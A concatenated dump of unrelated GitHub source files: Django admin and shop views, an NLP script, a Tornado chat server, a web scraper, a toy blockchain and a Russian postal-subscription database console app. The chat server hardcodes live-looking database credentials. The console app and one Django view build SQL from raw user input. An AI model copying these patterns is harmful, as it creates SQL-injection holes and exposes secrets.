reverse_lazy('admin:django_celery_results_taskresult_changelist'), result.task_id, result.status))\n )\n\n\nrefresh_realm.short_description = \"Actualiser la configuration Keycloak\"\n\n\nclass SSOConfigAdmin(admin.ModelAdmin):\n model = SSOConfig\n fields = ['well_known_oidc', 'public_key']\n readonly_fields = ['well_known_oidc', 'public_key']\n actions = [refresh_realm]\n\n def has_add_permission(self, request):\n # check if generally has add permission\n if SSOConfig.objects.exists():\n return False\n return super().has_add_permission(request)\n\n\nclass SSOProfileInline(admin.StackedInline):\n model = SSOUserProfile\n readonly_fields = ['sub', 'access_token', 'expires_before',\n 'refresh_token', 'refresh_expires_before']\n\n\nclass CustomUserAdmin(UserAdmin):\n inlines = [SSOProfileInline]\n list_display = ['username', 'email', 'get_groups',\n 'is_staff', 'is_sso', 'get_notifications', 'last_login']\n search_fields = ['username', 'email', 'groups__name']\n\n def get_groups(self, obj):\n return \", \".join([g.name for g in obj.groups.all()])\n\n get_groups.short_description = \"Groupes\"\n\n def get_notifications(self, obj):\n # notifications are always disabled for superusers\n if obj.is_superuser:\n return \"\"\n result = []\n if obj.has_perm('shared.be_notified_on_fne'):\n result.append(\"FNE\")\n if obj.has_perm('shared.be_notified_on_simi'):\n result.append(\"Similitudes\")\n if obj.has_perm('shared.be_notified_on_brouillage'):\n result.append(\"Brouillage\")\n return ', '.join(result)\n\n get_notifications.short_description = \"Notifications\"\n\n def is_sso(self, obj):\n try:\n return obj.sso_profile.sub is not None\n except:\n return False\n is_sso.boolean = True\n is_sso.short_description = \"SSO\"\n\n\nclass GroupAdminForm(ModelForm):\n # edit user set from group admin\n class Meta:\n model = Group\n exclude = []\n\n # Add the users field.\n users = ModelMultipleChoiceField(\n queryset=get_user_model().objects.all(),\n required=False,\n # Use the pretty 'filter_horizontal widget'.\n widget=FilteredSelectMultiple('users', False)\n )\n\n def __init__(self, *args, **kwargs):\n # Do the normal form initialisation.\n super(GroupAdminForm, self).__init__(*args, **kwargs)\n # If it is an existing group (saved objects have a pk).\n if self.instance.pk:\n # Populate the users field with the current Group users.\n self.fields['users'].initial = self.instance.user_set.all()\n\n def save_m2m(self):\n # Add the users to the Group.\n self.instance.user_set.set(self.cleaned_data['users'])\n\n def save(self, *args, **kwargs):\n # Default save\n instance = super(GroupAdminForm, self).save()\n # Save many-to-many data\n self.save_m2m()\n return instance\n\n\nclass CustomGroupAdmin(GroupAdmin):\n list_display = [\n 'name', 'is_validator', 'is_investigator', 'has_all_access'\n ]\n form = GroupAdminForm\n\n def is_validator(self, obj):\n return config.group_is_validator(obj)\n\n is_validator.short_description = \"Validateur\"\n is_validator.boolean = True\n is_validator.help_text = \"Valide les fiches avant traitement (ex : Chef de Salle)\"\n\n def has_all_access(self, obj):\n return config.group_has_all_access(obj)\n\n has_all_access.short_description = \"Accès complet\"\n has_all_access.boolean = True\n has_all_access.help_text = \"A accès à toutes les fiches, mêmes celles en traitement par un autre groupe (ex : subdivision QSS)\"\n\n def is_investigator(self, obj):\n return config.group_is_investigator(obj)\n\n is_investigator.short_description = \"Investigateur\"\n is_investigator.boolean = True\n is_investigator.help_text = \"A accès aux fiches qui lui sont attribuées pour traitement (ex : subdivision hors QSS)\"\n\n\nadmin.site.register(SSOConfig, SSOConfigAdmin)\nadmin.site.unregister(get_user_model())\nadmin.site.register(get_user_model(), CustomUserAdmin)\nadmin.site.unregister(Group)\nadmin.site.register(Group, CustomGroupAdmin)\nadmin.site.login_template = \"sso/login.html\"\n","repo_name":"Gribou/Diapason-forms","sub_path":"api/sso/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14685307863","text":"from ckip_transformers.nlp import CkipWordSegmenter, CkipPosTagger, CkipNerChunker\nimport pandas as pd\n\n\ndef pack_ws_pos_sentece(sentence_ws, sentence_pos):\n assert len(sentence_ws) == len(sentence_pos)\n res = []\n for word_ws, word_pos in zip(sentence_ws, sentence_pos):\n if(word_pos == 'Na'):\n res.append(f\"{word_ws} \")\n return \"\\u3000\".join(res)\n\n\n# Show results(contain NER)\n# for sentence, sentence_ws, sentence_pos, sentence_ner in zip(text, ws, pos, ner):\n# print(sentence)\n# print(pack_ws_pos_sentece(sentence_ws, sentence_pos))\n# for entity in sentence_ner:\n# print(entity)\n# print()\nif __name__ == \"__main__\":\n # data = pd.read_csv(r\"dataset\\food_positve.csv\")\n # text_list = [i for i in data['caption']]\n # print(text_list)\n # Initialize drivers\n ws_driver = CkipWordSegmenter(level=3)\n pos_driver = CkipPosTagger(level=3)\n ner_driver = CkipNerChunker(level=1)\n\n text = [\"擔仔麵的味道很純厚,讓人想一直吃下去!\"]\n ws = ws_driver(text)\n pos = pos_driver(ws)\n ner = ner_driver(text)\n for sentence, sentence_ws, sentence_pos, sentence_ner in zip(text, ws, pos, ner):\n print(sentence)\n print(pack_ws_pos_sentece(sentence_ws, sentence_pos))\n for entity in sentence_ner:\n print(entity)\n print()\n","repo_name":"godspeedhuang/Food_Recommendation_Linebot","sub_path":"recognize_food_n.py","file_name":"recognize_food_n.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28114105404","text":"# Source Taken from:\n# https://realpython.com/python-logging/\n# https://stackoverflow.com/questions/11232230/logging-to-two-files-with-different-settings\n\nimport logging\n\n\ndef setup_logger(name, log_file, level=logging.INFO):\n # Create a custom logger\n logger = logging.getLogger(name)\n\n # Create handlers\n c_handler = logging.StreamHandler()\n f_handler = logging.FileHandler(log_file)\n c_handler.setLevel(level)\n f_handler.setLevel(level)\n\n # Create formatters and add it to handlers\n c_format = logging.Formatter('[%(levelname)s] %(message)s')\n f_format = logging.Formatter('%(asctime)s - %(name)s - [%(levelname)s] %(message)s')\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n # Add handlers to the logger\n logger.addHandler(c_handler)\n logger.addHandler(f_handler)\n\n return logger\n\n\nlog = setup_logger('default', 'file.log', logging.DEBUG)\n","repo_name":"WckdAwe/Uncuffed","sub_path":"Uncuffed/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"23876395074","text":"import sys\r\nimport copy\r\ninput = sys.stdin.readline\r\nfrom collections import deque\r\nfrom itertools import permutations\r\nfrom sys import setrecursionlimit\r\nsetrecursionlimit(10**8)\r\n\r\n# 버튼을 누르는 모든 경우 완전탐색 BFS\r\n# \r\n\r\ndef sol() :\r\n F,S,G,U,D = list(map(int,input().split()))\r\n # S에서 G로 가기\r\n # 최고 높이 : F층\r\n visited = {}\r\n def BFS():\r\n visited[S] = 1\r\n q = deque()\r\n q.append((S,0))\r\n while q :\r\n currFloor,count = q.popleft()\r\n if currFloor == G :\r\n return count\r\n for nextFloor in [currFloor+U,currFloor-D]:\r\n if nextFloor > F or nextFloor <= 0 : continue\r\n if visited.get(nextFloor) : continue\r\n visited[nextFloor] = 1\r\n q.append((nextFloor,count+1))\r\n return 'use the stairs'\r\n return BFS()\r\nprint(sol())\r\n","repo_name":"wooryjoon/algorithms","sub_path":"백준/Silver/5014. 스타트링크/스타트링크.py","file_name":"스타트링크.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22096965421","text":"import logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nimport torndb\nimport os.path\nimport uuid\nimport urllib2\nimport json\nfrom datetime import datetime\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=3000, help=\"run on the given port\", type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/chatsocket\", ChatSocketHandler),\n ]\n\n settings = dict(\n cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n )\n\n tornado.web.Application.__init__(self, handlers, **settings)\n\n\nclass ChatSocketHandler(tornado.websocket.WebSocketHandler):\n waiters = set()\n cache = {'users':[], 'messages':[]}\n cache_size = 10000\n\n if len(cache['messages']) == 0:\n db = torndb.Connection(\"betoncombat.mysql.pythonanywhere-services.com\", \"betoncombat$boc\", user ='betoncombat', password='makemoney')\n for db_message in db.query(\"SELECT * FROM chat_chatmessage LEFT JOIN auth_user on chat_chatmessage.user_id = auth_user.id ORDER BY timestamp LIMIT 50 \"):\n message = {\n \"id\": str(db_message.id),\n \"body\": db_message.text,\n \"username\": db_message.username,\n \"timestamp\": db_message.timestamp.isoformat()\n }\n\n\n cache['messages'].insert(len(cache['messages']), message)\n\n def check_origin(self, origin):\n return True\n\n def allow_draft76(self):\n # for iOS 5.0 Safari\n return True\n\n def open(self):\n user = self.get_user()\n if user:\n self.user = self.get_user()\n ChatSocketHandler.waiters.add(self)\n\n def on_close(self):\n try:\n self.cache['users'].remove(self.user)\n self.cache['users'].sort()\n self.update_users()\n ChatSocketHandler.waiters.remove(self)\n except:\n ChatSocketHandler.waiters.remove(self)\n\n\n def get_user(self):\n #get session key\n cookies = self.request.headers['Cookie'].split('; ')\n sessionid = None\n for cookie in cookies:\n if \"sessionid\" in cookie:\n sessionid = cookie.split(\"=\")[1]\n if sessionid:\n #post request to server\n url = self.request.headers[\"Origin\"]+\"/chat/auth/\"\n req = urllib2.Request(url)\n response = urllib2.urlopen(req, \"sessionid=\"+sessionid)\n result = response.read()\n result = json.loads(result)\n return result['user']\n return None\n\n @classmethod\n def update_message_cache(cls, chat):\n cls.cache['messages'].append(chat)\n if len(cls.cache['messages']) > cls.cache_size:\n cls.cache['messages'] = cls.cache['messages'][cls.cache_size:]\n\n\n @classmethod\n def send_updates(cls, chat):\n logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(chat)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n\n def update_users(self):\n users = {\"type\": \"users\"}\n users['users'] = ChatSocketHandler.cache['users']\n for waiter in self.waiters:\n try:\n waiter.write_message(users)\n except:\n pass\n\n\n def on_message(self, message):\n logging.info(\"got message %r\", message)\n parsed = tornado.escape.json_decode(message)\n if parsed['type'] == \"auth\":\n #update users\n if parsed['user'] not in self.cache['users']:\n self.cache['users'].append(parsed['user'])\n self.cache['users'].sort()\n ChatSocketHandler.update_users(self)\n\n #return messages\n chat = {}\n chat[\"messages\"] = ChatSocketHandler.cache['messages']\n chat[\"type\"] = \"auth\"\n ChatSocketHandler.send_updates(chat)\n\n elif parsed['type'] == \"message\":\n #get session key\n user = self.get_user()\n\n message = {\n \"id\": str(uuid.uuid4()),\n \"body\": parsed[\"body\"],\n \"username\": user['username'],\n \"timestamp\": datetime.now().isoformat()\n }\n\n chat = {\"type\": 'message', \"messages\": [message]}\n\n ChatSocketHandler.update_message_cache(message)\n ChatSocketHandler.send_updates(chat)\n\n\ndef main():\n tornado.options.parse_command_line()\n app = Application()\n app.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"betoncombat/betoncombat","sub_path":"chat/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73220904420","text":"\"\"\"\n抓取豆瓣电影排行榜\n\"\"\"\nimport re\n\nimport requests\nimport time\nimport random\nfrom fake_useragent import UserAgent\nimport json\n\n\nclass DoubanSpider:\n def __init__(self):\n self.get_js_url = 'https://movie.douban.com/j/chart/top_list?type={}&interval_id=100%3A90&action=&start={}&limit=20'\n self.index_url = 'https://movie.douban.com/chart'\n self.get_total_url = 'https://movie.douban.com/j/chart/top_list_count?type={}&interval_id=100%3A90'\n\n def get_html(self, url):\n headers = {'User-Agent': UserAgent().random}\n html = requests.get(url=url, headers=headers).text\n return html\n\n def parse_js_html(self, url):\n html = self.get_html(url=url)\n html = json.loads(html)\n for one_file_dict in html:\n item = {}\n item['rank'] = one_file_dict['rank']\n item['title'] = one_file_dict['title']\n item['score'] = one_file_dict['score']\n item['time'] = one_file_dict['release_date']\n print(item)\n\n def get_total(self, url):\n html = self.get_html(url=url)\n json_obj = json.loads(html)\n total = json_obj['total']\n return total\n\n def get_category(self, category):\n regex = '''{}'''.format(category)\n html = self.get_html(self.index_url)\n href = re.findall(regex, html)[0]\n return re.findall('type=(.*?)&', href, re.S)[0]\n\n def crawl(self):\n category = input(\"\"\"请输入电影的种类\n 剧情,喜剧,动作,爱情,科幻,动画,悬疑,惊悚,恐怖,纪录片,短片,情色,同性,音乐,歌舞,家庭,儿童,传记,历史,战争,犯罪,西部,奇幻,冒险,灾难,武侠,古装,运动,黑色电影\n \"\"\")\n type = self.get_category(category)\n total = self.get_total(self.get_total_url.format(type))\n for start in range(1,total,20):\n url = self.get_js_url.format(type, start)\n # print(url)\n self.parse_js_html(url)\n time.sleep(random.uniform(0,2))\n\n\n\nif __name__ == '__main__':\n spider = DoubanSpider()\n spider.crawl()\n","repo_name":"chaofan-zheng/python_learning_code","sub_path":"month05/Spider/day04_course/day04_code/06_doubanSpider.py","file_name":"06_doubanSpider.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1340742415","text":"def graphToGenome(genome):\n\tlist1 = []\n\tvertices = []\n\tedges = []\n\tisTrue = True\n\tfor i in range(len(genome)*2):\n\t\tedges.append(0)\n\n\tfor i in genome:\n\t\tedges[i[1]-1] = i[0] - 1\n\t\tedges[i[0]-1] = i[1] - 1\n\n\tfor j in genome:\n\t\tbegin = j[0]\n\n\t\tif begin in vertices:\n\t\t\tcontinue\n\t\tif begin%2 == 0:\n\t\t\tend = begin-1\n\t\telse:\n\t\t\tend = begin+1\n\t\t\t\n\t\tP = []\n\t\ti = 0\n\t\twhile(isTrue):\n\t\t\tif begin%2 == 0:\n\t\t\t\tP.append(begin/2)\n\t\t\telse:\n\t\t\t\tP.append(-(begin+1)/2)\n\t\t\tdest = edges[begin-1]+1\n\t\t\ti += 1\n\t\t\tvertices.append(dest)\n\t\t\tif dest == end:\n\t\t\t\tlist1.append(P)\n\t\t\t\tbreak\n\n\t\t\tif dest%2 == 0:\n\t\t\t\tbegin = dest - 1\n\t\t\telse:\n\t\t\t\tbegin = dest + 1\n\n\treturn list1\n\ndef main():\n\tfile1 = open('input5.txt')\n\tpfile1 = file1.readlines()[0]\n\tpfile1 = pfile1.replace(\")(\", \"),(\")\n\tpfile1 = pfile1.replace(\" \", \"\")\n\tP = eval(\"[%s]\" % pfile1)\n\ttext = graphToGenome(P)\n\t#print text\n\tf = open('ot3.txt')\n\tline = f.readline().replace('[', '(').replace(']',')').replace(', ', ' ').replace(') (', ')(').replace('((','(').replace('))',\")\")\n\toutput = open('output.txt', 'w')\n\toutput.write(line)\n\t#print line\n\nmain()\n\n\n\n\n\n","repo_name":"kedarpujara/BioinformaticsAlgorithms","sub_path":"Rosalind1/Prob58/graphGenome.py","file_name":"graphGenome.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16292599087","text":"import hashlib\nimport json\nfrom time import time\nfrom .proof_of_work import proof_of_work\n\n\nclass Blockchain():\n def __init__(self, difficulty=16, load=None, **kwargs):\n self.difficulty = difficulty\n self._chain = []\n self._pending_transactions = []\n\n if load is None:\n nonce, hash_result = proof_of_work('root_hash', difficulty)\n self.new_block(proof=nonce, previous_hash=hash_result)\n else:\n self.read(load, **kwargs)\n\n def add_transaction(self, sender, recipient, amount):\n \"\"\"Add a new transaction to the pending transactions.\"\"\"\n transaction = {\n 'sender': sender,\n 'recipient': recipient,\n 'amount': float(amount)\n }\n\n self._pending_transactions.append(transaction)\n\n def hash(self, block):\n string_object = json.dumps(block, sort_keys=True)\n block_string = string_object.encode()\n\n raw_hash = hashlib.sha256(block_string)\n hex_hash = raw_hash.hexdigest()\n\n return hex_hash\n\n @property\n def last_block(self):\n \"\"\"Return the most recent block.\"\"\"\n return self._chain[-1]\n\n def new_block(self, proof, previous_hash=None):\n block = {\n 'index': self.number_blocks,\n 'timestamp': time(),\n 'transactions': self._pending_transactions,\n 'proof': proof,\n 'previous_hash': previous_hash or self.hash(self.last_block),\n }\n\n self._chain.append(block)\n self._pending_transactions = []\n\n @property\n def number_blocks(self):\n \"\"\"Return the number of pending transactions.\"\"\"\n return len(self._chain)\n\n @property\n def number_pending_transactions(self):\n \"\"\"Return the number of pending transactions.\"\"\"\n return len(self._pending_transactions)\n\n def read(self, path, **kwargs):\n with open(path, 'r') as fp:\n read_data = json.load(fp, **kwargs)\n\n for idx, block in enumerate(read_data):\n if idx > 0:\n if self.hash(self.last_block) != block['previous_hash']:\n raise(ValueError('Different block hashes!'))\n\n self._chain.append(block)\n\n def write(self, path, **kwargs):\n with open(path, 'w') as fp:\n json.dump(self._chain, fp, **kwargs)","repo_name":"polynomialchaos/pyblockchain","sub_path":"pyblockchain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23317151793","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', IndexListView.as_view(), name='index'),\n path('shop/', ShopView.as_view(), name='shop'),\n path('product//', ProductDetail.as_view(), name='product'),\n path('sign_in/', login_register, name='login_register'),\n path('login/', user_login, name='login'),\n path('register/', user_register, name='register'),\n path('logout/', user_logout, name='logout'),\n path('save_review//', save_review, name='save_review'),\n path('cart/', cart, name='cart'),\n path('to_cart///', to_cart, name='to_cart'),\n path('checkout/', checkout, name='checkout'),\n path('payment/', create_checkout_session, name='payment'),\n path('success/', success_payment, name='success')\n]\n","repo_name":"fomichevevgeniy/furni_shop_django","sub_path":"untree/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38610493029","text":"import psycopg2\nfrom psycopg2 import OperationalError, ProgrammingError\nfrom tabulate import tabulate\n\n\n# Функций подключения\ndef create_connection(db, user, password, host, port):\n connection = None\n try:\n connection = psycopg2.connect(\n database=db,\n user=user,\n password=password,\n host=host,\n port=port\n )\n print('Соединение с базой данных Белпочты установлено.')\n print()\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n print('Соединение с базой данных Белпочты НЕ установлено!\\n'\n 'Все внесенные изменения не будут сохранены!\\n'\n 'Подключите базу данных!')\n print()\n\n return connection\n\n\ndef execute_query(connection, query):\n '''\n Функция исполняет запрос в базе данных и в случае успешного выполнения выводит\n сообщение об успешном действии\n Для таких запросов как INSERT INTO и т.д.\n '''\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print('Ваш запрос выполнен')\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n\n\ndef fetchall_query(connection, query):\n '''\n Функция для запросов, с помощью которых можно получить данные\n например SELECT и т.д.\n '''\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n try:\n columns = [desc[0] for desc in cursor.description]\n record = cursor.fetchall()\n print(tabulate(record, headers=columns, tablefmt='psql'))\n # for rec in record:\n # print(rec)\n except ProgrammingError as e:\n print(f'Произошла ошибка \"{e}\"')\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n\n\n# Главное меню программы\ndef main_menu():\n command = input('Введите номер команды: \\n'\n '1 - Работа с получателями\\n'\n '2 - Работа с подписками\\n'\n '3 - Работа с изданиями\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\n# Подменю \"Получатель\" и его функции\ndef menu_poluchateli():\n command = input('Введите номер команды: \\n'\n '1 - Добавить нового получателя\\n'\n '2 - Удалить получателя\\n'\n '3 - Выбрать получателя\\n'\n '4 - Посмотреть всех получателей\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход в главное меню\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_poluchatel():\n kod_poluchatelya = input('Введите код получателя: ')\n fio = input('Введите ФИО получателя: ')\n address = input('Введите адрес получателя: ')\n query = f\"INSERT INTO poluchatel VALUES ({kod_poluchatelya}, '{fio}', '{address}');\"\n return query\n\n\ndef del_poluchatel():\n print('Вы собираетесь удалить получателя из базы данных\\n')\n kod_poluchatelya = input('Введите код получателя, которого вы хотите удалить из базы данных: ')\n query = f\"DELETE FROM poluchatel WHERE kod_poluchatelya = {kod_poluchatelya};\"\n return query\n\n\ndef choose_poluchatel():\n flag = True\n while flag:\n kod_poluchatelya = input('Введите код получателя, информацию о котором вы хотите узнать: ')\n if kod_poluchatelya.isdigit():\n query = f\"SELECT * FROM poluchatel WHERE kod_poluchatelya = {kod_poluchatelya};\"\n flag = False\n return query\n else:\n flag = True\n print('Команда не найдена')\n print()\n\n\ndef all_poluchatel():\n query = f\"SELECT * FROM poluchatel;\"\n return query\n\n\n# Подменю \"Подписки\" и его функции\ndef menu_podpiski():\n command = input('Введите номер команды: \\n'\n '1 - Добавить новою подписку\\n'\n '2 - Удалить подписку\\n'\n '3 - Выбрать подписку\\n'\n '4 - Посмотреть все оформленные подписки\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_podpiska():\n kod_poluchatelya = input('Введите код получателя: ')\n idx_izdaniya = input('Введите индекс издания: ')\n srok_podpiski = input('Введите срок подписки: ')\n while srok_podpiski not in ('1', '3', '6'):\n print('Доступный срок подписки: 1, 3 или 6 месяцев\\n')\n srok_podpiski = input('Введите срок подписки: ')\n month = input('Введите месяц начала доставки издания: ')\n while month not in ('1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'):\n print('Диапазон месяцев от 1 до 12\\n')\n month = input('Введите месяц начала доставки издания: ')\n year = input('Введите год начала доставки издания: ')\n query = f\"INSERT INTO podpiski VALUES ({kod_poluchatelya}, {idx_izdaniya}, {srok_podpiski}, {month}, {year});\"\n return query\n\n\ndef del_podpiska():\n print('Вы собираетесь удалить подписку из базы данных\\n')\n kod_poluchatelya = input('Введите код получателя, подписку которого вы хотите удалить из базы данных: ')\n idx_izdaniya = input('Введите индекс издания, на которое оформлена подписка: ')\n query = f\"DELETE FROM podpiski WHERE kod_poluchatelya = {kod_poluchatelya} AND idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef choose_podpiska():\n kod_poluchatelya = input('Введите код получателя, информацию о подписке которого вы хотите узнать: ')\n idx_izdaniya = input('Введите индекс издания, на которое оформлена подписка получателя: ')\n query = f\"SELECT * FROM podpiski WHERE kod_poluchatelya = {kod_poluchatelya} AND idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef all_podpiska():\n query = f\"SELECT * FROM podpiski;\"\n return query\n\n\n# Подменю \"Издания\" и его функции\ndef menu_izdaniya():\n command = input('Введите номер команды: \\n'\n '1 - Добавить новою издание\\n'\n '2 - Удалить издание\\n'\n '3 - Выбрать издание\\n'\n '4 - Посмотреть все доступные для подписки издания\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_izdaniya():\n idx_izdaniya = input('Введите индекс издания: ')\n vid_izdaniya = input('Введите вид издания: ')\n name_izdaniya = input('Введите название издания: ')\n price = input('Введите стоимость подписки на издание на 1 мес.: ')\n query = f\"INSERT INTO izdaniya VALUES ({idx_izdaniya}, '{vid_izdaniya}', '{name_izdaniya}', {price});\"\n return query\n\n\ndef del_izdaniya():\n print('Вы собираетесь удалить издание из базы данных\\n')\n idx_izdaniya = input('Введите индекс издания, которое вы хотите удалить: ')\n query = f\"DELETE FROM izdaniya WHERE idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef choose_izdaniya():\n idx_izdaniya = input('Введите индекс издания, информацию о котором вы хотите узнать: ')\n query = f\"SELECT * FROM izdaniya WHERE idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef all_izdaniya():\n query = f\"SELECT * FROM izdaniya;\"\n return query\n\n\n# Функция запуска программы\ndef start_program():\n # Вызываем главное меню и не завершаем программу пока пользователь\n # Не введет 'exit'\n command = main_menu()\n while command != 'exit':\n # Вызываем подменю \"Получатель\"\n if command == '1':\n command = menu_poluchateli()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_poluchatel())\n print('Новый получатель добавлен')\n print()\n command = menu_poluchateli()\n elif command == '2':\n execute_query(connection, del_poluchatel())\n print('Получатель удален')\n print()\n command = menu_poluchateli()\n elif command == '3':\n fetchall_query(connection, choose_poluchatel())\n command = menu_poluchateli()\n print()\n elif command == '4':\n fetchall_query(connection, all_poluchatel())\n print()\n command = menu_poluchateli()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n # Вызываем подменю \"Подписки\"\n elif command == '2':\n command = menu_podpiski()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_podpiska())\n print('Новый подписка добавлена')\n print()\n command = menu_podpiski()\n elif command == '2':\n execute_query(connection, del_podpiska())\n print('Подписка удалена')\n print()\n command = menu_podpiski()\n elif command == '3':\n fetchall_query(connection, choose_podpiska())\n command = menu_podpiski()\n print()\n elif command == '4':\n fetchall_query(connection, all_podpiska())\n print()\n command = menu_podpiski()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n # Вызываем подменю \"Издания\"\n elif command == '3':\n command = menu_izdaniya()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_izdaniya())\n print('Новое издание добавлено')\n print()\n command = menu_izdaniya()\n elif command == '2':\n execute_query(connection, del_izdaniya())\n print('Издание удалено')\n print()\n command = menu_izdaniya()\n elif command == '3':\n fetchall_query(connection, choose_izdaniya())\n command = menu_izdaniya()\n print()\n elif command == '4':\n fetchall_query(connection, all_izdaniya())\n print()\n command = menu_izdaniya()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n\n\ndef eng_program():\n if connection:\n connection.close()\n print('Соединение с базой данный закрыто')\n else:\n print('Соединение с базой данных не было установлено. Программа закрыта')\n\n\nconnection = create_connection('bel_post_2', 'postgres', '1234', '127.0.0.1', '5432')\nstart_program()\neng_program()\n","repo_name":"WiFighter01/College","sub_path":"Homework/connection_to_db.py","file_name":"connection_to_db.py","file_ext":"py","file_size_in_byte":14237,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29203893825","text":"from django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom django.db import connection\nfrom django.db import transaction\n\nfrom .models import Gifts, Bucket, GiftItemOrder\n\n\ndef view_gifts(request, template_name='view_gifts.html'):\n \n books_gifts = Gifts.objects.filter(caregory='Books')\n flowers_gifts = Gifts.objects.filter(caregory='Flowers')\n other_gifts = Gifts.objects.filter(caregory='Other')\n\n return render(request, template_name, {'books_gifts': books_gifts,\n 'flowers_gifts': flowers_gifts,\n 'other_gifts': other_gifts})\n\n@login_required(login_url='/login/')\ndef view_gift_details(request, pk):\n template_name='view_gift_details.html'\n gift = Gifts.objects.get(pk=pk)\n\n if request.method == 'GET':\n return render(request, template_name, {'gift': gift})\n\n elif request.method == 'POST':\n\n gift_quantity = request.POST.get('gift_quantity')\n\n gift.quantity -= int(gift_quantity)\n gift.save()\n\n bucket = Bucket.objects.get(user_id=request.user.id, is_ordered=False)\n\n giftitem = GiftItemOrder.objects.create(gift_id=pk, quantity=gift_quantity,\n bucket_id=bucket.id)\n\n return redirect(reverse('gifts:view_bucket_details', args=(bucket.id,)))\n\n\n@login_required(login_url='/login/')\ndef view_buckets(request, template_name='view_buckets.html'):\n \n buckets = Bucket.objects.filter(user_id=request.user.id)\n\n if not buckets:\n Bucket.objects.create(user_id=request.user.id, name='My Gift Bucket')\n\n\n return render(request, template_name, {'buckets': buckets})\n\n\n@login_required(login_url='/login/')\ndef view_bucket_details(request, pk):\n template_name='view_bucket_details.html'\n # bucket = Bucket.objects.get(pk=pk)\n bucket = Bucket.objects.raw('SELECT * FROM GIFTS_BUCKET WHERE ID = {}'.format(pk))[0]\n\n\n giftitemorder = GiftItemOrder.objects.filter(bucket_id=bucket.id)\n if request.method == 'GET':\n return render(request, template_name, {'bucket': bucket, 'giftitemorder': giftitemorder})\n\n if request.method == 'POST':\n new_bucket_name = request.POST.get('new_bucket_name')\n\n with transaction.atomic():\n cursor = connection.cursor()\n cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')\n\n\n bucket.is_ordered = True\n bucket.ordered_time = timezone.now()\n bucket.save()\n\n # If name `MyName` exist - replase to `MyName(1)` or `MyName(2)` ...\n i = 0\n while True:\n i += 1\n is_exist = Bucket.objects.filter(user_id=request.user.id, name=new_bucket_name)\n if not is_exist:\n 